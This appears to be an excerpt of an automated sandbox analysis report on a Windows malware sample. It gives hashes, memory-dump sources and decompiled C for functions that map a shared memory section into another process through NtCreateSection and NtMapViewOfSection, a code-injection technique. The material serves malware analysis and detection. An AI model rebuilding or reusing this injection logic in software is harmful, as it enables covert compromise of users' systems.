
Uniqueness Score: -1.00%

Function 0040159D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.421398877.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d11267ad9383aa9ce61a8b658cc38431f51729ba456cf5806145cb2615b78401
Instruction ID: 94e1fd373f19b4e3f94f7ef0f3e31781e10bf96d0b34e49fc91fe9c03923878a
Opcode Fuzzy Hash: d11267ad9383aa9ce61a8b658cc38431f51729ba456cf5806145cb2615b78401
Instruction Fuzzy Hash: 89D0A72A5643024FC231DE344EC64D8BF21EA89624B5D1A58C5512BB66A918B5478561

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC61 Relevance: 6.1, APIs: 4, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__crt_waiting_on_module_handle.LIBCMT ref: 0040BC7E
__lock.LIBCMT ref: 0040BCD9
__lock.LIBCMT ref: 0040BCFA
___addlocaleref.LIBCMT ref: 0040BD18

Memory Dump Source

Source File: 00000000.00000002.421446652.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
String ID:
API String ID: 1628550938-0
Opcode ID: dd9c941b7d5243e807d78a2ff3ca0a7c98cc4853e136772392673b276f99019d
Instruction ID: 30c0c8111be0bbeb9f42d495f58f615a9bb7a61a946e7c3ae008e394fa3971bb
Opcode Fuzzy Hash: dd9c941b7d5243e807d78a2ff3ca0a7c98cc4853e136772392673b276f99019d
Instruction Fuzzy Hash: 44119D71904702AEE720AF669941B5ABBE0AF04318F10493FE599B73E1CB789940CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB1F Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040CB2B

Part of subcall function 0040BDC1: __getptd_noexit.LIBCMT ref: 0040BDC4
Part of subcall function 0040BDC1: __amsg_exit.LIBCMT ref: 0040BDD1

__getptd.LIBCMT ref: 0040CB42
__amsg_exit.LIBCMT ref: 0040CB50
__lock.LIBCMT ref: 0040CB60

Memory Dump Source

Source File: 00000000.00000002.421446652.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 28ef39373d2d80ff1ea67696e6b4150e91f1d702da5ad9707b4328577ce6dd30
Instruction ID: 6f8d3a60b8f59a529b8c558f61c376ca78f6142a8e8cfd50cb85859c21d3f7cc
Opcode Fuzzy Hash: 28ef39373d2d80ff1ea67696e6b4150e91f1d702da5ad9707b4328577ce6dd30
Instruction Fuzzy Hash: 85F06232A40714CBD720BB65984775A73A09F00724F10467FB940B72D2CB3CA941DA9E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wdscedePID: 6128, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	8.6%
Signature Coverage:	0%
Total number of Nodes:	604
Total number of Limit Nodes:	10

Executed Functions

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00401615(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, signed int _a1750575217) {
				void* _v3;
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				HANDLE* _v72;
				char _v76;
				char _v84;
				char _v88;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t120;
				void** _t121;
				signed char _t124;
				void* _t128;
				void* _t129;
				signed char _t130;
				void* _t131;
				void* _t133;
				HANDLE* _t134;
				intOrPtr* _t137;
				intOrPtr* _t138;
				void* _t141;
				long _t156;

				_push(0x165f);
				_t91 =  *_t137;
				_t138 = _t137 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t128 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t128, _t131, _t133, _t141);
				asm("cld");
				asm("invalid");
				_t118 = _a4;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				_v96 = _t93;
				_t134 =  &_v100;
				 *_t134 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t134);
				_t96 =  *_t134;
				if(_t96 != 0) {
					_t121 =  &_v52;
					 *_t121 = _t96;
					_t121[1] = 0;
					_t134 =  &_v44;
					 *((intOrPtr*)(_t118 + 0x10))(_t134, 0x18);
					 *_t134 = 0x18;
					_t130 = _t134;
					_push( &_v52);
					_push(_t130);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
						_v12 = 0;
						_t103 =  &_v84;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t134 =  &_v88;
						if(NtCreateSection(_t134, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t111 =  &_v72;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t134, 0xffffffff, _t111, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t113 =  &_v64;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t134, _v16, _t113, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
									_t134 = _v72;
									 *((intOrPtr*)(_t118 + 0x20))(0, _t134, 0x104);
									_t134[0x82] = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t105 =  &_v84;
						_t124 = _a12 + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t124;
						while(1) {
							_a1750575217 = _a1750575217 | _t124;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t124;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t134) != 0 || _v12 == 0) {
								goto L75;
							}
							_push(_v84);
							_pop( *_t47);
							_t107 =  &_v76;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t134, 0xffffffff, _t107, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t109 =  &_v68;
								 *_t109 = 0;
								_t124 =  &_v60;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t130;
									 *((intOrPtr*)(_t124 + 0x57)) =  *((intOrPtr*)(_t124 + 0x57)) + _t130;
									_push(0);
									_push(0);
									_push(_t109);
									_push(_v16);
									_t109 = NtMapViewOfSection( *_t134);
									_t156 = _t109;
									if(_t156 != 0) {
										goto L75;
									}
									L28();
									if(_t156 == 0 && _t156 != 0) {
										asm("out dx, al");
										if(_t156 > 0) {
											continue;
										} else {
											if (_t156 > 0) goto L22;
											goto L32;
										}
									}
									goto L75;
								}
							}
							goto L75;
						}
					}
				}
				L75:
				_push(0x165f);
				_t97 =  *_t138;
				_t120 = 0x38c;
				_t129 = 0xfd;
				L004012A4(_t97, _t118, _t120, _t129, 0, _t134, __eflags);
				return _t97;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
Instruction ID: b20ec665c7e4e3296b0f18af3c28397e7cf24639ebe04dcdbabd140aff290070
Opcode Fuzzy Hash: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
Instruction Fuzzy Hash: 376160B0500249FBEB209F95CC49FEF7BB8EF91B00F14416AF912BA1E4D6759901DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401636 Relevance: 10.7, APIs: 7, Instructions: 192
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00401636(void* __eax) {
				void* _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void** _t122;
				signed char _t125;
				void* _t129;
				void* _t130;
				signed char _t131;
				void* _t132;
				HANDLE* _t136;
				void* _t139;
				void* _t140;
				intOrPtr* _t142;
				void* _t146;
				long _t161;

				_t91 = __eax;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t129 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t129, _t132, 0xf9e70ceb, _t146);
				_t140 = _t139 + 1;
				asm("cld");
				asm("invalid");
				_t118 =  *((intOrPtr*)(_t140 + 8));
				 *((intOrPtr*)(_t140 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t140 - 0x34)) =  *((intOrPtr*)(_t140 - 0x34)) + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t140 - 0x5c)) = _t93;
				_t136 = _t140 - 0x60;
				 *_t136 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t136);
				_t96 =  *_t136;
				if(_t96 != 0) {
					_t122 = _t140 - 0x30;
					 *_t122 = _t96;
					_t122[1] = 0;
					_t136 = _t140 - 0x28;
					 *((intOrPtr*)(_t118 + 0x10))(_t136, 0x18);
					 *_t136 = 0x18;
					_t131 = _t136;
					_push(_t140 - 0x30);
					_push(_t131);
					_push(0x40);
					_push(_t140 - 0x10);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t140 - 0x10), 0xffffffff, 0xffffffff, _t140 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t140 - 8)) = 0;
						_t103 = _t140 - 0x50;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t136 = _t140 - 0x54;
						if(NtCreateSection(_t136, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t140 - 0x50);
							_t111 = _t140 - 0x44;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t136, 0xffffffff, _t111, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
								_t113 = _t140 - 0x3c;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t136,  *(_t140 - 0xc), _t113, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
									_t136 =  *(_t140 - 0x44);
									 *((intOrPtr*)(_t118 + 0x20))(0, _t136, 0x104);
									_t136[0x82] =  *(_t140 + 0x14);
									 *((intOrPtr*)(_t140 - 8)) =  *((intOrPtr*)(_t140 - 8)) + 1;
								}
							}
						}
						_t105 = _t140 - 0x50;
						_t125 =  *((intOrPtr*)(_t140 + 0x10)) + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t125;
						while(1) {
							 *(_t140 + 0x6857a875) =  *(_t140 + 0x6857a875) | _t125;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t125;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t136) != 0 ||  *((intOrPtr*)(_t140 - 8)) == 0) {
								goto L73;
							}
							 *_t47 =  *(_t140 - 0x50);
							_t107 = _t140 - 0x48;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t136, 0xffffffff, _t107, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
								_t109 = _t140 - 0x40;
								 *_t109 = 0;
								_t125 = _t140 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t131;
									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
									_push(0);
									_push(0);
									_push(_t109);
									_push( *(_t140 - 0xc));
									_t109 = NtMapViewOfSection( *_t136);
									_t161 = _t109;
									if(_t161 != 0) {
										goto L73;
									}
									L26();
									if(_t161 == 0 && _t161 != 0) {
										asm("out dx, al");
										if(_t161 > 0) {
											continue;
										} else {
											if (_t161 > 0) goto L20;
											goto L30;
										}
									}
									goto L73;
								}
							}
							goto L73;
						}
					}
				}
				L73:
				_push(0x165f);
				_t97 =  *_t142;
				_t121 = 0x38c;
				_t130 = 0xfd;
				L004012A4(_t97, _t118, _t121, _t130, 0, _t136, __eflags);
				return _t97;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
Instruction ID: 1a98c01ee067268ab26ec5aa6b62cb03245118aa372be3bd2590492ddd99a6c2
Opcode Fuzzy Hash: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
Instruction Fuzzy Hash: 3B616EB1900209AFDB209F91CC49FEF7BB8FF86700F14056AF911BA2E1D6759901CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00401620() {
				intOrPtr _t92;
				intOrPtr _t94;
				void* _t97;
				intOrPtr _t98;
				struct _GUID _t104;
				signed char* _t106;
				PVOID* _t108;
				PVOID* _t112;
				PVOID* _t114;
				void* _t118;
				intOrPtr _t119;
				void* _t122;
				void** _t123;
				signed char _t126;
				void* _t130;
				void* _t131;
				signed char _t132;
				void* _t133;
				void* _t136;
				HANDLE* _t137;
				void* _t140;
				void* _t141;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t148;
				long _t163;

				asm("out 0x31, eax");
				asm("out dx, al");
				_push(0x165f);
				_t92 =  *_t143;
				_t144 = _t143 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t130 = 0xfd;
				L004012A4(_t92, _t118, 0x38c, _t130, _t133, _t136, _t148);
				_t141 = _t140 + 1;
				asm("cld");
				asm("invalid");
				_t119 =  *((intOrPtr*)(_t141 + 8));
				 *((intOrPtr*)(_t141 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
				}
				while(1) {
					_t94 =  *((intOrPtr*)(_t119 + 0x48))();
					if(_t94 != 0) {
						break;
					}
					 *((intOrPtr*)(_t119 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t141 - 0x5c)) = _t94;
				_t137 = _t141 - 0x60;
				 *_t137 = 0;
				 *((intOrPtr*)(_t119 + 0x4c))(_t94, _t137);
				_t97 =  *_t137;
				if(_t97 != 0) {
					_t123 = _t141 - 0x30;
					 *_t123 = _t97;
					_t123[1] = 0;
					_t137 = _t141 - 0x28;
					 *((intOrPtr*)(_t119 + 0x10))(_t137, 0x18);
					 *_t137 = 0x18;
					_t132 = _t137;
					_push(_t141 - 0x30);
					_push(_t132);
					_push(0x40);
					_push(_t141 - 0x10);
					if( *((intOrPtr*)(_t119 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t141 - 8)) = 0;
						_t104 = _t141 - 0x50;
						 *((intOrPtr*)(_t104 + 4)) = 0;
						 *_t104 = 0x5000;
						_t137 = _t141 - 0x54;
						if(NtCreateSection(_t137, 6, 0, _t104, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t141 - 0x50);
							_t112 = _t141 - 0x44;
							 *_t112 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t112, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t114 = _t141 - 0x3c;
								 *_t114 = 0;
								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t114, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
									_t137 =  *(_t141 - 0x44);
									 *((intOrPtr*)(_t119 + 0x20))(0, _t137, 0x104);
									_t137[0x82] =  *(_t141 + 0x14);
									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
								}
							}
						}
						_t106 = _t141 - 0x50;
						_t126 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
						_t106[4] = 0;
						 *_t106 = _t126;
						while(1) {
							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t126;
							 *_t106 =  &(_t106[ *_t106]);
							 *_t106 =  *_t106 + _t126;
							_push(0x40);
							_push(_t106);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
								goto L74;
							}
							 *_t47 =  *(_t141 - 0x50);
							_t108 = _t141 - 0x48;
							 *_t108 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t108, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t110 = _t141 - 0x40;
								 *_t110 = 0;
								_t126 = _t141 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t132;
									 *((intOrPtr*)(_t126 + 0x57)) =  *((intOrPtr*)(_t126 + 0x57)) + _t132;
									_push(0);
									_push(0);
									_push(_t110);
									_push( *(_t141 - 0xc));
									_t110 = NtMapViewOfSection( *_t137);
									_t163 = _t110;
									if(_t163 != 0) {
										goto L74;
									}
									L27();
									if(_t163 == 0 && _t163 != 0) {
										asm("out dx, al");
										if(_t163 > 0) {
											continue;
										} else {
											if (_t163 > 0) goto L21;
											goto L31;
										}
									}
									goto L74;
								}
							}
							goto L74;
						}
					}
				}
				L74:
				_push(0x165f);
				_t98 =  *_t144;
				_t122 = 0x38c;
				_t131 = 0xfd;
				L004012A4(_t98, _t119, _t122, _t131, 0, _t137, __eflags);
				return _t98;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
Instruction ID: 1699ca97ca40bad7abeb66134b5fd6c1258c3ab016587a1f667b162b5110635e
Opcode Fuzzy Hash: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
Instruction Fuzzy Hash: 5B513DB4900249BFEB209F95CC48FEF7BB8EF85700F14416AF911BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401633 Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00401633(void* __edi) {
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void** _t122;
				signed char _t125;
				void* _t129;
				void* _t130;
				signed char _t131;
				void* _t136;
				HANDLE* _t137;
				void* _t140;
				void* _t141;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t148;
				long _t163;

				_t133 = __edi - 1;
				_t148 = __edi - 1;
				_push(0x165f);
				_t91 =  *_t143;
				_t144 = _t143 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t129 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t129, _t133, _t136, _t148);
				_t141 = _t140 + 1;
				asm("cld");
				asm("invalid");
				_t118 =  *((intOrPtr*)(_t141 + 8));
				 *((intOrPtr*)(_t141 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t141 - 0x5c)) = _t93;
				_t137 = _t141 - 0x60;
				 *_t137 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t137);
				_t96 =  *_t137;
				if(_t96 != 0) {
					_t122 = _t141 - 0x30;
					 *_t122 = _t96;
					_t122[1] = 0;
					_t137 = _t141 - 0x28;
					 *((intOrPtr*)(_t118 + 0x10))(_t137, 0x18);
					 *_t137 = 0x18;
					_t131 = _t137;
					_push(_t141 - 0x30);
					_push(_t131);
					_push(0x40);
					_push(_t141 - 0x10);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t141 - 8)) = 0;
						_t103 = _t141 - 0x50;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t137 = _t141 - 0x54;
						if(NtCreateSection(_t137, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t141 - 0x50);
							_t111 = _t141 - 0x44;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t111, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t113 = _t141 - 0x3c;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t113, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
									_t137 =  *(_t141 - 0x44);
									 *((intOrPtr*)(_t118 + 0x20))(0, _t137, 0x104);
									_t137[0x82] =  *(_t141 + 0x14);
									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
								}
							}
						}
						_t105 = _t141 - 0x50;
						_t125 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t125;
						while(1) {
							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t125;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t125;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
								goto L75;
							}
							 *_t47 =  *(_t141 - 0x50);
							_t107 = _t141 - 0x48;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t107, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t109 = _t141 - 0x40;
								 *_t109 = 0;
								_t125 = _t141 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t131;
									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
									_push(0);
									_push(0);
									_push(_t109);
									_push( *(_t141 - 0xc));
									_t109 = NtMapViewOfSection( *_t137);
									_t163 = _t109;
									if(_t163 != 0) {
										goto L75;
									}
									L28();
									if(_t163 == 0 && _t163 != 0) {
										asm("out dx, al");
										if(_t163 > 0) {
											continue;
										} else {
											if (_t163 > 0) goto L22;
											goto L32;
										}
									}
									goto L75;
								}
							}
							goto L75;
						}
					}
				}
				L75:
				_push(0x165f);
				_t97 =  *_t144;
				_t121 = 0x38c;
				_t130 = 0xfd;
				L004012A4(_t97, _t118, _t121, _t130, 0, _t137, __eflags);
				return _t97;
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
Instruction ID: 5655e8303908613cde864c6bbac167efe87e7d1838107c86971bbf59092d50a6
Opcode Fuzzy Hash: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
Instruction Fuzzy Hash: 57513BB0900249BBEB208F95CC48FEF7BB8EF85B00F14416AF911BA2E4D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004017E4 Relevance: 4.7, APIs: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000004.00000002.583862165.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_wdscede.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
Instruction ID: 821b0d10a87f8ebea7d35f23d7e2e973144a2f41bdb8f2b8da3a1113d8856595
Opcode Fuzzy Hash: fc4b47963422dcefc7eb3c8f01a7b8c00c64b8d35549142067844c51b0883b8d
Instruction Fuzzy Hash: 7F510773904144EBEB25AA55C844FAB77B5EF91300F28813BE842772F0D63C5A42D75B

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA51 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__malloc_crt.LIBCMT ref: 0040BA82

Memory Dump Source

Source File: 00000004.00000002.583987724.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

